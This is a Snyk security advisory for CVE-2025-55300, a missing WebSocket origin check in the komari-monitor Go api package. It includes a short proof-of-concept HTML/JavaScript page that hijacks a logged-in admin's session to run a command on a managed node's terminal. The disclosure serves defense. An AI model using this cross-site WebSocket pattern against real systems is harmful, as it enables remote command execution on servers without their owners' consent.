Homepage

Missing Origin Validation in WebSockets Affecting github.com/komari-monitor/komari/api package, versions <1.0.4-fix2

Severity

 Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.33% (56th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-GOLANG-GITHUBCOMKOMARIMONITORKOMARIAPI-11787833
  • published13 Aug 2025
  • disclosed12 Aug 2025
  • creditimlonghao
Report a new vulnerability Found a mistake?

Introduced: 12 Aug 2025

NewCVE-2025-55300  (opens in a new tab)
CWE-1385  (opens in a new tab)

How to fix?

Upgrade github.com/komari-monitor/komari/api to version 1.0.4-fix2 or higher.

Overview

Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets via the CheckOrigin function in the api/terminal.go file. An attacker can execute arbitrary commands on the target system by tricking an authenticated user into visiting a malicious web page that initiates unauthorized WebSocket connections using the user's credentials.

PoC

  1. Log in to your komari instance.
  2. By the HTML code on the internet, replace <komari-addr> and <target-uuid> with yours.
  3. When you visit the HTML page, you can see your node is executing uptime without your actions.
<pre></pre>
<script>
const socket = new WebSocket("wss://<komari-addr>/api/admin/client/<target-uuid>/terminal");
socket.addEventListener("open", (event) => {
  const binaryBlob = new Blob(['uptime\n'], { type: 'application/octet-stream' });
  socket.send(binaryBlob);
});
socket.addEventListener("message", (event) => {
  event.data.text().then(x => {document.querySelector("pre").append(x)});
});
</script>

CVSS Base Scores

version 4.0
version 3.1